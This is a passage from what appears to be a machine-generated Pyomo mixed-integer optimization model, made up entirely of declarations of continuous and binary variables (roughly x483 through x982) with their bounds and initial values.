= Var(within=Reals,bounds=(0,None),initialize=0) m.x483 = Var(within=Reals,bounds=(0,None),initialize=0) m.x484 = Var(within=Reals,bounds=(0,None),initialize=0) m.x485 = Var(within=Reals,bounds=(0,None),initialize=0) m.x486 = Var(within=Reals,bounds=(0,None),initialize=0) m.x487 = Var(within=Reals,bounds=(0,None),initialize=0) m.x488 = Var(within=Reals,bounds=(0,None),initialize=0) m.x489 = Var(within=Reals,bounds=(0,None),initialize=0) m.x490 = Var(within=Reals,bounds=(0,None),initialize=0) m.x491 = Var(within=Reals,bounds=(0,None),initialize=0) m.x492 = Var(within=Reals,bounds=(0,None),initialize=0) m.x493 = Var(within=Reals,bounds=(0,None),initialize=0) m.x494 = Var(within=Reals,bounds=(0,None),initialize=0) m.x495 = Var(within=Reals,bounds=(0,None),initialize=0) m.x496 = Var(within=Reals,bounds=(0,None),initialize=0) m.x497 = Var(within=Reals,bounds=(0,None),initialize=0) m.x498 = Var(within=Reals,bounds=(0,None),initialize=0) m.x499 = Var(within=Reals,bounds=(0,None),initialize=0) m.x500 = Var(within=Reals,bounds=(0,None),initialize=0) m.x501 = Var(within=Reals,bounds=(0,None),initialize=0) m.x502 = Var(within=Reals,bounds=(0,None),initialize=0) m.x503 = Var(within=Reals,bounds=(0,None),initialize=0) m.x504 = Var(within=Reals,bounds=(0,None),initialize=0) m.x505 = Var(within=Reals,bounds=(0,None),initialize=0) m.x506 = Var(within=Reals,bounds=(0,None),initialize=0) m.x507 = Var(within=Reals,bounds=(0,None),initialize=0) m.x508 = Var(within=Reals,bounds=(0,None),initialize=0) m.x509 = Var(within=Reals,bounds=(0,None),initialize=0) m.x510 = Var(within=Reals,bounds=(0,None),initialize=0) m.x511 = Var(within=Reals,bounds=(0,None),initialize=0) m.x512 = Var(within=Reals,bounds=(0,None),initialize=0) m.x513 = Var(within=Reals,bounds=(0,None),initialize=0) m.x514 = Var(within=Reals,bounds=(0,None),initialize=0) m.x515 = Var(within=Reals,bounds=(0,None),initialize=0) m.x516 = Var(within=Reals,bounds=(0,None),initialize=0) m.x517 = Var(within=Reals,bounds=(0,None),initialize=0) m.x518 = Var(within=Reals,bounds=(0,None),initialize=0) m.x519 = Var(within=Reals,bounds=(0,None),initialize=0) m.x520 = Var(within=Reals,bounds=(0,None),initialize=0) m.x521 = Var(within=Reals,bounds=(0,None),initialize=0) m.x522 = Var(within=Reals,bounds=(0,None),initialize=0) m.x523 = Var(within=Reals,bounds=(0,None),initialize=0) m.x524 = Var(within=Reals,bounds=(0,None),initialize=0) m.x525 = Var(within=Reals,bounds=(0,None),initialize=0) m.x526 = Var(within=Reals,bounds=(0,None),initialize=0) m.x527 = Var(within=Reals,bounds=(0,None),initialize=0) m.x528 = Var(within=Reals,bounds=(0,None),initialize=0) m.x529 = Var(within=Reals,bounds=(0,None),initialize=0) m.x530 = Var(within=Reals,bounds=(0,None),initialize=0) m.x531 = Var(within=Reals,bounds=(0,None),initialize=0) m.x532 = Var(within=Reals,bounds=(0,None),initialize=0) m.x533 = Var(within=Reals,bounds=(0,None),initialize=0) m.x534 = Var(within=Reals,bounds=(0,None),initialize=0) m.x535 = Var(within=Reals,bounds=(0,None),initialize=0) m.x536 = Var(within=Reals,bounds=(0,None),initialize=0) m.x537 = Var(within=Reals,bounds=(0,None),initialize=0) m.x538 = Var(within=Reals,bounds=(0,None),initialize=0) m.x539 = Var(within=Reals,bounds=(0,None),initialize=0) m.x540 = Var(within=Reals,bounds=(0,None),initialize=0) m.x541 = Var(within=Reals,bounds=(0,None),initialize=0) m.x542 = Var(within=Reals,bounds=(0,None),initialize=0) m.x543 = Var(within=Reals,bounds=(0,None),initialize=0) m.x544 = Var(within=Reals,bounds=(0,None),initialize=0) m.x545 = Var(within=Reals,bounds=(0,None),initialize=0) m.x546 = Var(within=Reals,bounds=(0,None),initialize=0) m.x547 = Var(within=Reals,bounds=(0,None),initialize=0) m.x548 = Var(within=Reals,bounds=(0,None),initialize=0) m.x549 = Var(within=Reals,bounds=(0,None),initialize=0) m.x550 = Var(within=Reals,bounds=(0,None),initialize=0) m.x551 = Var(within=Reals,bounds=(0,None),initialize=0) m.x552 = Var(within=Reals,bounds=(0,None),initialize=0) m.x553 = Var(within=Reals,bounds=(0,None),initialize=0) m.x554 = Var(within=Reals,bounds=(0,None),initialize=0) m.x555 = Var(within=Reals,bounds=(0,None),initialize=0) m.x556 = Var(within=Reals,bounds=(0,None),initialize=0) m.x557 = Var(within=Reals,bounds=(0,None),initialize=0) m.x558 = Var(within=Reals,bounds=(0,None),initialize=0) m.x559 = Var(within=Reals,bounds=(0,None),initialize=0) m.x560 = Var(within=Reals,bounds=(0,None),initialize=0) m.x561 = Var(within=Reals,bounds=(0,None),initialize=0) m.x562 = Var(within=Reals,bounds=(0,None),initialize=0) m.x563 = Var(within=Reals,bounds=(0,None),initialize=0) m.x564 = Var(within=Reals,bounds=(0,None),initialize=0) m.x565 = Var(within=Reals,bounds=(0,None),initialize=0) m.x566 = Var(within=Reals,bounds=(0,None),initialize=0) m.x567 = Var(within=Reals,bounds=(0,None),initialize=0) m.x568 = Var(within=Reals,bounds=(0,None),initialize=0) m.x569 = Var(within=Reals,bounds=(0,None),initialize=0) m.x570 = Var(within=Reals,bounds=(0,None),initialize=0) m.x571 = Var(within=Reals,bounds=(0,None),initialize=0) m.x572 = Var(within=Reals,bounds=(0,None),initialize=0) m.x573 = Var(within=Reals,bounds=(0,None),initialize=0) m.x574 = Var(within=Reals,bounds=(0,None),initialize=0) m.x575 = Var(within=Reals,bounds=(0,None),initialize=0) m.x576 = Var(within=Reals,bounds=(0,None),initialize=0) m.x577 = Var(within=Reals,bounds=(0,None),initialize=0) m.x578 = Var(within=Reals,bounds=(0,None),initialize=0) m.x579 = Var(within=Reals,bounds=(0,None),initialize=0) m.x580 = Var(within=Reals,bounds=(0,None),initialize=0) m.x581 = Var(within=Reals,bounds=(0,None),initialize=0) m.x582 = Var(within=Reals,bounds=(0,None),initialize=0) m.x583 = Var(within=Reals,bounds=(0,None),initialize=0) m.x584 = Var(within=Reals,bounds=(0,None),initialize=0) m.x585 = Var(within=Reals,bounds=(0,None),initialize=0) m.x586 = Var(within=Reals,bounds=(0,None),initialize=0) m.x587 = Var(within=Reals,bounds=(0,None),initialize=0) m.x588 = Var(within=Reals,bounds=(0,None),initialize=0) m.x589 = Var(within=Reals,bounds=(0,None),initialize=0) m.x590 = Var(within=Reals,bounds=(0,None),initialize=0) m.x591 = Var(within=Reals,bounds=(0,None),initialize=0) m.x592 = Var(within=Reals,bounds=(0,None),initialize=0) m.x593 = Var(within=Reals,bounds=(0,None),initialize=0) m.x594 = Var(within=Reals,bounds=(0,None),initialize=0) m.x595 = Var(within=Reals,bounds=(0,None),initialize=0) m.x596 = Var(within=Reals,bounds=(0,None),initialize=0) m.x597 = Var(within=Reals,bounds=(0,None),initialize=0) m.x598 = Var(within=Reals,bounds=(0,None),initialize=0) m.x599 = Var(within=Reals,bounds=(0,None),initialize=0) m.x600 = Var(within=Reals,bounds=(0,None),initialize=0) m.x601 = Var(within=Reals,bounds=(0,None),initialize=0) m.x602 = Var(within=Reals,bounds=(0,None),initialize=0) m.x603 = Var(within=Reals,bounds=(0,None),initialize=0) m.x604 = Var(within=Reals,bounds=(0,None),initialize=0) m.x605 = Var(within=Reals,bounds=(0,None),initialize=0) m.x606 = Var(within=Reals,bounds=(0,None),initialize=0) m.x607 = Var(within=Reals,bounds=(0,None),initialize=0) m.x608 = Var(within=Reals,bounds=(0,None),initialize=0) m.x609 = Var(within=Reals,bounds=(0,None),initialize=0) m.x610 = Var(within=Reals,bounds=(0,None),initialize=0) m.x611 = Var(within=Reals,bounds=(0,None),initialize=0) m.x612 = Var(within=Reals,bounds=(0,None),initialize=0) m.x613 = Var(within=Reals,bounds=(0,None),initialize=0) m.x614 = Var(within=Reals,bounds=(0,None),initialize=0) m.x615 = Var(within=Reals,bounds=(0,None),initialize=0) m.x616 = Var(within=Reals,bounds=(0,None),initialize=0) m.x617 = Var(within=Reals,bounds=(0,None),initialize=0) m.x618 = Var(within=Reals,bounds=(0,None),initialize=0) m.x619 = Var(within=Reals,bounds=(0,None),initialize=0) m.x620 = Var(within=Reals,bounds=(0,None),initialize=0) m.x621 = Var(within=Reals,bounds=(0,None),initialize=0) m.x622 = Var(within=Reals,bounds=(0,None),initialize=0) m.x623 = Var(within=Reals,bounds=(0,None),initialize=0) m.x624 = Var(within=Reals,bounds=(0,None),initialize=0) m.x625 = Var(within=Reals,bounds=(0,None),initialize=0) m.x626 = Var(within=Reals,bounds=(0,None),initialize=0) m.x627 = Var(within=Reals,bounds=(0,None),initialize=0) m.x628 = Var(within=Reals,bounds=(0,None),initialize=0) m.x629 = Var(within=Reals,bounds=(0,None),initialize=0) m.x630 = Var(within=Reals,bounds=(0,None),initialize=0) m.x631 = Var(within=Reals,bounds=(0,None),initialize=0) m.x632 = Var(within=Reals,bounds=(0,None),initialize=0) m.x633 = Var(within=Reals,bounds=(0,None),initialize=0) m.x634 = Var(within=Reals,bounds=(0,None),initialize=0) m.x635 = Var(within=Reals,bounds=(0,None),initialize=0) m.x636 = Var(within=Reals,bounds=(0,None),initialize=0) m.x637 = Var(within=Reals,bounds=(0,None),initialize=0) m.x638 = Var(within=Reals,bounds=(0,None),initialize=0) m.x639 = Var(within=Reals,bounds=(0,None),initialize=0) m.x640 = Var(within=Reals,bounds=(0,None),initialize=0) m.x641 = Var(within=Reals,bounds=(0,None),initialize=0) m.x642 = Var(within=Reals,bounds=(0,None),initialize=0) m.x643 = Var(within=Reals,bounds=(0,None),initialize=0) m.x644 = Var(within=Reals,bounds=(0,None),initialize=0) m.x645 = Var(within=Reals,bounds=(0,None),initialize=0) m.x646 = Var(within=Reals,bounds=(0,None),initialize=0) m.x647 = Var(within=Reals,bounds=(0,None),initialize=0) m.x648 = Var(within=Reals,bounds=(0,None),initialize=0) m.x649 = Var(within=Reals,bounds=(0,None),initialize=0) m.x650 = Var(within=Reals,bounds=(0,None),initialize=0) m.x651 = Var(within=Reals,bounds=(0,None),initialize=0) m.x652 = Var(within=Reals,bounds=(0,None),initialize=0) m.x653 = Var(within=Reals,bounds=(0,None),initialize=0) m.x654 = Var(within=Reals,bounds=(0,None),initialize=0) m.x655 = Var(within=Reals,bounds=(0,None),initialize=0) m.x656 = Var(within=Reals,bounds=(0,None),initialize=0) m.x657 = Var(within=Reals,bounds=(0,None),initialize=0) m.x658 = Var(within=Reals,bounds=(0,None),initialize=0) m.x659 = Var(within=Reals,bounds=(0,None),initialize=0) m.x660 = Var(within=Reals,bounds=(0,None),initialize=0) m.x661 = Var(within=Reals,bounds=(0,None),initialize=0) m.x662 = Var(within=Reals,bounds=(0,None),initialize=0) m.x663 = Var(within=Reals,bounds=(0,None),initialize=0) m.x664 = Var(within=Reals,bounds=(0,None),initialize=0) m.x665 = Var(within=Reals,bounds=(0,None),initialize=0) m.x666 = Var(within=Reals,bounds=(0,None),initialize=0) m.x667 = Var(within=Reals,bounds=(0,None),initialize=0) m.x668 = Var(within=Reals,bounds=(0,None),initialize=0) m.x669 = Var(within=Reals,bounds=(0,None),initialize=0) m.x670 = Var(within=Reals,bounds=(0,None),initialize=0) m.x671 = Var(within=Reals,bounds=(0,None),initialize=0) m.x672 = Var(within=Reals,bounds=(0,None),initialize=0) m.x673 = Var(within=Reals,bounds=(0,None),initialize=0) m.x674 = Var(within=Reals,bounds=(0,None),initialize=0) m.x675 = Var(within=Reals,bounds=(0,None),initialize=0) m.x676 = Var(within=Reals,bounds=(0,None),initialize=0) m.x677 = Var(within=Reals,bounds=(0,None),initialize=0) m.x678 = Var(within=Reals,bounds=(0,None),initialize=0) m.x679 = Var(within=Reals,bounds=(0,None),initialize=0) m.x680 = Var(within=Reals,bounds=(0,None),initialize=0) m.x681 = Var(within=Reals,bounds=(0,None),initialize=0) m.x682 = Var(within=Reals,bounds=(0,None),initialize=0) m.x683 = Var(within=Reals,bounds=(0,None),initialize=0) m.x684 = Var(within=Reals,bounds=(0,None),initialize=0) m.x685 = Var(within=Reals,bounds=(0,None),initialize=0) m.x686 = Var(within=Reals,bounds=(0,None),initialize=0) m.x687 = Var(within=Reals,bounds=(0,None),initialize=0) m.x688 = Var(within=Reals,bounds=(0,None),initialize=0) m.x689 = Var(within=Reals,bounds=(0,None),initialize=0) m.x690 = Var(within=Reals,bounds=(0,None),initialize=0) m.x691 = Var(within=Reals,bounds=(0,None),initialize=0) m.x692 = Var(within=Reals,bounds=(0,None),initialize=0) m.x693 = Var(within=Reals,bounds=(0,None),initialize=0) m.x694 = Var(within=Reals,bounds=(0,None),initialize=0) m.x695 = Var(within=Reals,bounds=(0,None),initialize=0) m.x696 = Var(within=Reals,bounds=(0,None),initialize=0) m.x697 = Var(within=Reals,bounds=(0,None),initialize=0) m.x698 = Var(within=Reals,bounds=(0,None),initialize=0) m.x699 = Var(within=Reals,bounds=(0,None),initialize=0) m.x700 = Var(within=Reals,bounds=(0,None),initialize=0) m.x701 = Var(within=Reals,bounds=(0,None),initialize=0) m.x702 = Var(within=Reals,bounds=(0,None),initialize=0) m.x703 = Var(within=Reals,bounds=(0,None),initialize=0) m.b704 = Var(within=Binary,bounds=(0,1),initialize=0) m.b705 = Var(within=Binary,bounds=(0,1),initialize=0) m.b706 = Var(within=Binary,bounds=(0,1),initialize=0) m.b707 = Var(within=Binary,bounds=(0,1),initialize=0) m.b708 = Var(within=Binary,bounds=(0,1),initialize=0) m.b709 = Var(within=Binary,bounds=(0,1),initialize=0) m.b710 = Var(within=Binary,bounds=(0,1),initialize=0) m.b711 = Var(within=Binary,bounds=(0,1),initialize=0) m.b712 = Var(within=Binary,bounds=(0,1),initialize=0) m.b713 = Var(within=Binary,bounds=(0,1),initialize=0) m.b714 = Var(within=Binary,bounds=(0,1),initialize=0) m.b715 = Var(within=Binary,bounds=(0,1),initialize=0) m.b716 = Var(within=Binary,bounds=(0,1),initialize=0) m.b717 = Var(within=Binary,bounds=(0,1),initialize=0) m.b718 = Var(within=Binary,bounds=(0,1),initialize=0) m.b719 = Var(within=Binary,bounds=(0,1),initialize=0) m.b720 = Var(within=Binary,bounds=(0,1),initialize=0) m.b721 = Var(within=Binary,bounds=(0,1),initialize=0) m.b722 = Var(within=Binary,bounds=(0,1),initialize=0) m.b723 = Var(within=Binary,bounds=(0,1),initialize=0) m.b724 = Var(within=Binary,bounds=(0,1),initialize=0) m.b725 = Var(within=Binary,bounds=(0,1),initialize=0) m.b726 = Var(within=Binary,bounds=(0,1),initialize=0) m.b727 = Var(within=Binary,bounds=(0,1),initialize=0) m.b728 = Var(within=Binary,bounds=(0,1),initialize=0) m.b729 = Var(within=Binary,bounds=(0,1),initialize=0) m.b730 = Var(within=Binary,bounds=(0,1),initialize=0) m.b731 = Var(within=Binary,bounds=(0,1),initialize=0) m.b732 = Var(within=Binary,bounds=(0,1),initialize=0) m.b733 = Var(within=Binary,bounds=(0,1),initialize=0) m.b734 = Var(within=Binary,bounds=(0,1),initialize=0) m.b735 = Var(within=Binary,bounds=(0,1),initialize=0) m.b736 = Var(within=Binary,bounds=(0,1),initialize=0) m.b737 = Var(within=Binary,bounds=(0,1),initialize=0) m.b738 = Var(within=Binary,bounds=(0,1),initialize=0) m.b739 = Var(within=Binary,bounds=(0,1),initialize=0) m.b740 = Var(within=Binary,bounds=(0,1),initialize=0) m.b741 = Var(within=Binary,bounds=(0,1),initialize=0) m.b742 = Var(within=Binary,bounds=(0,1),initialize=0) m.b743 = Var(within=Binary,bounds=(0,1),initialize=0) m.b744 = Var(within=Binary,bounds=(0,1),initialize=0) m.b745 = Var(within=Binary,bounds=(0,1),initialize=0) m.b746 = Var(within=Binary,bounds=(0,1),initialize=0) m.b747 = Var(within=Binary,bounds=(0,1),initialize=0) m.b748 = Var(within=Binary,bounds=(0,1),initialize=0) m.b749 = Var(within=Binary,bounds=(0,1),initialize=0) m.b750 = Var(within=Binary,bounds=(0,1),initialize=0) m.b751 = Var(within=Binary,bounds=(0,1),initialize=0) m.b752 = Var(within=Binary,bounds=(0,1),initialize=0) m.b753 = Var(within=Binary,bounds=(0,1),initialize=0) m.b754 = Var(within=Binary,bounds=(0,1),initialize=0) m.b755 = Var(within=Binary,bounds=(0,1),initialize=0) m.b756 = Var(within=Binary,bounds=(0,1),initialize=0) m.b757 = Var(within=Binary,bounds=(0,1),initialize=0) m.b758 = Var(within=Binary,bounds=(0,1),initialize=0) m.b759 = Var(within=Binary,bounds=(0,1),initialize=0) m.b760 = Var(within=Binary,bounds=(0,1),initialize=0) m.b761 = Var(within=Binary,bounds=(0,1),initialize=0) m.b762 = Var(within=Binary,bounds=(0,1),initialize=0) m.b763 = Var(within=Binary,bounds=(0,1),initialize=0) m.b764 = Var(within=Binary,bounds=(0,1),initialize=0) m.b765 = Var(within=Binary,bounds=(0,1),initialize=0) m.b766 = Var(within=Binary,bounds=(0,1),initialize=0) m.b767 = Var(within=Binary,bounds=(0,1),initialize=0) m.b768 = Var(within=Binary,bounds=(0,1),initialize=0) m.b769 = Var(within=Binary,bounds=(0,1),initialize=0) m.b770 = Var(within=Binary,bounds=(0,1),initialize=0) m.b771 = Var(within=Binary,bounds=(0,1),initialize=0) m.b772 = Var(within=Binary,bounds=(0,1),initialize=0) m.b773 = Var(within=Binary,bounds=(0,1),initialize=0) m.b774 = Var(within=Binary,bounds=(0,1),initialize=0) m.b775 = Var(within=Binary,bounds=(0,1),initialize=0) m.b776 = Var(within=Binary,bounds=(0,1),initialize=0) m.b777 = Var(within=Binary,bounds=(0,1),initialize=0) m.b778 = Var(within=Binary,bounds=(0,1),initialize=0) m.b779 = Var(within=Binary,bounds=(0,1),initialize=0) m.b780 = Var(within=Binary,bounds=(0,1),initialize=0) m.b781 = Var(within=Binary,bounds=(0,1),initialize=0) m.b782 = Var(within=Binary,bounds=(0,1),initialize=0) m.b783 = Var(within=Binary,bounds=(0,1),initialize=0) m.b784 = Var(within=Binary,bounds=(0,1),initialize=0) m.b785 = Var(within=Binary,bounds=(0,1),initialize=0) m.b786 = Var(within=Binary,bounds=(0,1),initialize=0) m.b787 = Var(within=Binary,bounds=(0,1),initialize=0) m.b788 = Var(within=Binary,bounds=(0,1),initialize=0) m.b789 = Var(within=Binary,bounds=(0,1),initialize=0) m.b790 = Var(within=Binary,bounds=(0,1),initialize=0) m.b791 = Var(within=Binary,bounds=(0,1),initialize=0) m.b792 = Var(within=Binary,bounds=(0,1),initialize=0) m.b793 = Var(within=Binary,bounds=(0,1),initialize=0) m.b794 = Var(within=Binary,bounds=(0,1),initialize=0) m.b795 = Var(within=Binary,bounds=(0,1),initialize=0) m.b796 = Var(within=Binary,bounds=(0,1),initialize=0) m.b797 = Var(within=Binary,bounds=(0,1),initialize=0) m.b798 = Var(within=Binary,bounds=(0,1),initialize=0) m.b799 = Var(within=Binary,bounds=(0,1),initialize=0) m.b800 = Var(within=Binary,bounds=(0,1),initialize=0) m.b801 = Var(within=Binary,bounds=(0,1),initialize=0) m.b802 = Var(within=Binary,bounds=(0,1),initialize=0) m.b803 = Var(within=Binary,bounds=(0,1),initialize=0) m.b804 = Var(within=Binary,bounds=(0,1),initialize=0) m.b805 = Var(within=Binary,bounds=(0,1),initialize=0) m.b806 = Var(within=Binary,bounds=(0,1),initialize=0) m.b807 = Var(within=Binary,bounds=(0,1),initialize=0) m.b808 = Var(within=Binary,bounds=(0,1),initialize=0) m.b809 = Var(within=Binary,bounds=(0,1),initialize=0) m.b810 = Var(within=Binary,bounds=(0,1),initialize=0) m.b811 = Var(within=Binary,bounds=(0,1),initialize=0) m.b812 = Var(within=Binary,bounds=(0,1),initialize=0) m.b813 = Var(within=Binary,bounds=(0,1),initialize=0) m.b814 = Var(within=Binary,bounds=(0,1),initialize=0) m.b815 = Var(within=Binary,bounds=(0,1),initialize=0) m.b816 = Var(within=Binary,bounds=(0,1),initialize=0) m.b817 = Var(within=Binary,bounds=(0,1),initialize=0) m.b818 = Var(within=Binary,bounds=(0,1),initialize=0) m.b819 = Var(within=Binary,bounds=(0,1),initialize=0) m.b820 = Var(within=Binary,bounds=(0,1),initialize=0) m.b821 = Var(within=Binary,bounds=(0,1),initialize=0) m.b822 = Var(within=Binary,bounds=(0,1),initialize=0) m.b823 = Var(within=Binary,bounds=(0,1),initialize=0) m.b824 = Var(within=Binary,bounds=(0,1),initialize=0) m.b825 = Var(within=Binary,bounds=(0,1),initialize=0) m.b826 = Var(within=Binary,bounds=(0,1),initialize=0) m.b827 = Var(within=Binary,bounds=(0,1),initialize=0) m.b828 = Var(within=Binary,bounds=(0,1),initialize=0) m.b829 = Var(within=Binary,bounds=(0,1),initialize=0) m.b830 = Var(within=Binary,bounds=(0,1),initialize=0) m.b831 = Var(within=Binary,bounds=(0,1),initialize=0) m.b832 = Var(within=Binary,bounds=(0,1),initialize=0) m.b833 = Var(within=Binary,bounds=(0,1),initialize=0) m.b834 = Var(within=Binary,bounds=(0,1),initialize=0) m.b835 = Var(within=Binary,bounds=(0,1),initialize=0) m.b836 = Var(within=Binary,bounds=(0,1),initialize=0) m.b837 = Var(within=Binary,bounds=(0,1),initialize=0) m.b838 = Var(within=Binary,bounds=(0,1),initialize=0) m.b839 = Var(within=Binary,bounds=(0,1),initialize=0) m.b840 = Var(within=Binary,bounds=(0,1),initialize=0) m.b841 = Var(within=Binary,bounds=(0,1),initialize=0) m.b842 = Var(within=Binary,bounds=(0,1),initialize=0) m.b843 = Var(within=Binary,bounds=(0,1),initialize=0) m.b844 = Var(within=Binary,bounds=(0,1),initialize=0) m.b845 = Var(within=Binary,bounds=(0,1),initialize=0) m.b846 = Var(within=Binary,bounds=(0,1),initialize=0) m.b847 = Var(within=Binary,bounds=(0,1),initialize=0) m.b848 = Var(within=Binary,bounds=(0,1),initialize=0) m.b849 = Var(within=Binary,bounds=(0,1),initialize=0) m.b850 = Var(within=Binary,bounds=(0,1),initialize=0) m.b851 = Var(within=Binary,bounds=(0,1),initialize=0) m.b852 = Var(within=Binary,bounds=(0,1),initialize=0) m.b853 = Var(within=Binary,bounds=(0,1),initialize=0) m.b854 = Var(within=Binary,bounds=(0,1),initialize=0) m.b855 = Var(within=Binary,bounds=(0,1),initialize=0) m.b856 = Var(within=Binary,bounds=(0,1),initialize=0) m.b857 = Var(within=Binary,bounds=(0,1),initialize=0) m.b858 = Var(within=Binary,bounds=(0,1),initialize=0) m.b859 = Var(within=Binary,bounds=(0,1),initialize=0) m.b860 = Var(within=Binary,bounds=(0,1),initialize=0) m.b861 = Var(within=Binary,bounds=(0,1),initialize=0) m.b862 = Var(within=Binary,bounds=(0,1),initialize=0) m.b863 = Var(within=Binary,bounds=(0,1),initialize=0) m.b864 = Var(within=Binary,bounds=(0,1),initialize=0) m.b865 = Var(within=Binary,bounds=(0,1),initialize=0) m.b866 = Var(within=Binary,bounds=(0,1),initialize=0) m.b867 = Var(within=Binary,bounds=(0,1),initialize=0) m.b868 = Var(within=Binary,bounds=(0,1),initialize=0) m.b869 = Var(within=Binary,bounds=(0,1),initialize=0) m.b870 = Var(within=Binary,bounds=(0,1),initialize=0) m.b871 = Var(within=Binary,bounds=(0,1),initialize=0) m.b872 = Var(within=Binary,bounds=(0,1),initialize=0) m.b873 = Var(within=Binary,bounds=(0,1),initialize=0) m.b874 = Var(within=Binary,bounds=(0,1),initialize=0) m.b875 = Var(within=Binary,bounds=(0,1),initialize=0) m.b876 = Var(within=Binary,bounds=(0,1),initialize=0) m.b877 = Var(within=Binary,bounds=(0,1),initialize=0) m.b878 = Var(within=Binary,bounds=(0,1),initialize=0) m.b879 = Var(within=Binary,bounds=(0,1),initialize=0) m.b880 = Var(within=Binary,bounds=(0,1),initialize=0) m.b881 = Var(within=Binary,bounds=(0,1),initialize=0) m.b882 = Var(within=Binary,bounds=(0,1),initialize=0) m.b883 = Var(within=Binary,bounds=(0,1),initialize=0) m.b884 = Var(within=Binary,bounds=(0,1),initialize=0) m.b885 = Var(within=Binary,bounds=(0,1),initialize=0) m.b886 = Var(within=Binary,bounds=(0,1),initialize=0) m.b887 = Var(within=Binary,bounds=(0,1),initialize=0) m.b888 = Var(within=Binary,bounds=(0,1),initialize=0) m.b889 = Var(within=Binary,bounds=(0,1),initialize=0) m.b890 = Var(within=Binary,bounds=(0,1),initialize=0) m.b891 = Var(within=Binary,bounds=(0,1),initialize=0) m.b892 = Var(within=Binary,bounds=(0,1),initialize=0) m.b893 = Var(within=Binary,bounds=(0,1),initialize=0) m.b894 = Var(within=Binary,bounds=(0,1),initialize=0) m.b895 = Var(within=Binary,bounds=(0,1),initialize=0) m.x896 = Var(within=Reals,bounds=(0,40),initialize=0) m.x897 = Var(within=Reals,bounds=(0,40),initialize=0) m.x898 = Var(within=Reals,bounds=(0,40),initialize=0) m.x899 = Var(within=Reals,bounds=(0,None),initialize=0) m.x900 = Var(within=Reals,bounds=(0,None),initialize=0) m.x901 = Var(within=Reals,bounds=(0,None),initialize=0) m.x902 = Var(within=Reals,bounds=(0,None),initialize=0) m.x903 = Var(within=Reals,bounds=(0,None),initialize=0) m.x904 = Var(within=Reals,bounds=(0,None),initialize=0) m.x905 = Var(within=Reals,bounds=(0,None),initialize=0) m.x906 = Var(within=Reals,bounds=(0,None),initialize=0) m.x907 = Var(within=Reals,bounds=(0,None),initialize=0) m.x908 = Var(within=Reals,bounds=(0,None),initialize=0) m.x909 = Var(within=Reals,bounds=(0,None),initialize=0) m.x910 = Var(within=Reals,bounds=(0,None),initialize=0) m.x911 = Var(within=Reals,bounds=(0,None),initialize=0) m.x912 = Var(within=Reals,bounds=(0,None),initialize=0) m.x913 = Var(within=Reals,bounds=(0,None),initialize=0) m.x914 = Var(within=Reals,bounds=(0,None),initialize=0) m.x915 = Var(within=Reals,bounds=(0,None),initialize=0) m.x916 = Var(within=Reals,bounds=(0,None),initialize=0) m.x917 = Var(within=Reals,bounds=(0,None),initialize=0) m.x918 = Var(within=Reals,bounds=(0,None),initialize=0) m.x919 = Var(within=Reals,bounds=(0,None),initialize=0) m.x920 = Var(within=Reals,bounds=(0,None),initialize=0) m.x921 = Var(within=Reals,bounds=(0,None),initialize=0) m.x922 = Var(within=Reals,bounds=(0,None),initialize=0) m.x923 = Var(within=Reals,bounds=(0,None),initialize=0) m.x924 = Var(within=Reals,bounds=(0,None),initialize=0) m.x925 = Var(within=Reals,bounds=(0,None),initialize=0) m.x926 = Var(within=Reals,bounds=(0,None),initialize=0) m.x927 = Var(within=Reals,bounds=(0,None),initialize=0) m.x928 = Var(within=Reals,bounds=(0,None),initialize=0) m.x929 = Var(within=Reals,bounds=(0,30),initialize=0) m.x930 = Var(within=Reals,bounds=(0,30),initialize=0) m.x931 = Var(within=Reals,bounds=(0,30),initialize=0) m.x932 = Var(within=Reals,bounds=(0,None),initialize=0) m.x933 = Var(within=Reals,bounds=(0,None),initialize=0) m.x934 = Var(within=Reals,bounds=(0,None),initialize=0) m.x935 = Var(within=Reals,bounds=(0,None),initialize=0) m.x936 = Var(within=Reals,bounds=(0,None),initialize=0) m.x937 = Var(within=Reals,bounds=(0,None),initialize=0) m.x938 = Var(within=Reals,bounds=(0,None),initialize=0) m.x939 = Var(within=Reals,bounds=(0,None),initialize=0) m.x940 = Var(within=Reals,bounds=(0,None),initialize=0) m.x941 = Var(within=Reals,bounds=(0,None),initialize=0) m.x942 = Var(within=Reals,bounds=(0,None),initialize=0) m.x943 = Var(within=Reals,bounds=(0,None),initialize=0) m.x944 = Var(within=Reals,bounds=(0,None),initialize=0) m.x945 = Var(within=Reals,bounds=(0,None),initialize=0) m.x946 = Var(within=Reals,bounds=(0,None),initialize=0) m.x947 = Var(within=Reals,bounds=(0,None),initialize=0) m.x948 = Var(within=Reals,bounds=(0,None),initialize=0) m.x949 = Var(within=Reals,bounds=(0,None),initialize=0) m.x950 = Var(within=Reals,bounds=(0,None),initialize=0) m.x951 = Var(within=Reals,bounds=(0,None),initialize=0) m.x952 = Var(within=Reals,bounds=(0,None),initialize=0) m.x953 = Var(within=Reals,bounds=(0,None),initialize=0) m.x954 = Var(within=Reals,bounds=(0,None),initialize=0) m.x955 = Var(within=Reals,bounds=(0,None),initialize=0) m.x956 = Var(within=Reals,bounds=(0,None),initialize=0) m.x957 = Var(within=Reals,bounds=(0,None),initialize=0) m.x958 = Var(within=Reals,bounds=(0,None),initialize=0) m.x959 = Var(within=Reals,bounds=(0,None),initialize=0) m.x960 = Var(within=Reals,bounds=(0,None),initialize=0) m.x961 = Var(within=Reals,bounds=(0,None),initialize=0) m.x962 = Var(within=Reals,bounds=(0,None),initialize=0) m.x963 = Var(within=Reals,bounds=(0,None),initialize=0) m.x964 = Var(within=Reals,bounds=(0,None),initialize=0) m.x965 = Var(within=Reals,bounds=(0,None),initialize=0) m.x966 = Var(within=Reals,bounds=(0,None),initialize=0) m.x967 = Var(within=Reals,bounds=(0,None),initialize=0) m.x968 = Var(within=Reals,bounds=(0,None),initialize=0) m.x969 = Var(within=Reals,bounds=(0,None),initialize=0) m.x970 = Var(within=Reals,bounds=(0,None),initialize=0) m.x971 = Var(within=Reals,bounds=(0,None),initialize=0) m.x972 = Var(within=Reals,bounds=(0,None),initialize=0) m.x973 = Var(within=Reals,bounds=(0,None),initialize=0) m.x974 = Var(within=Reals,bounds=(0,None),initialize=0) m.x975 = Var(within=Reals,bounds=(0,None),initialize=0) m.x976 = Var(within=Reals,bounds=(0,None),initialize=0) m.x977 = Var(within=Reals,bounds=(0,None),initialize=0) m.x978 = Var(within=Reals,bounds=(0,None),initialize=0) m.x979 = Var(within=Reals,bounds=(0,None),initialize=0) m.x980 = Var(within=Reals,bounds=(0,20),initialize=0) m.x981 = Var(within=Reals,bounds=(0,20),initialize=0) m.x982 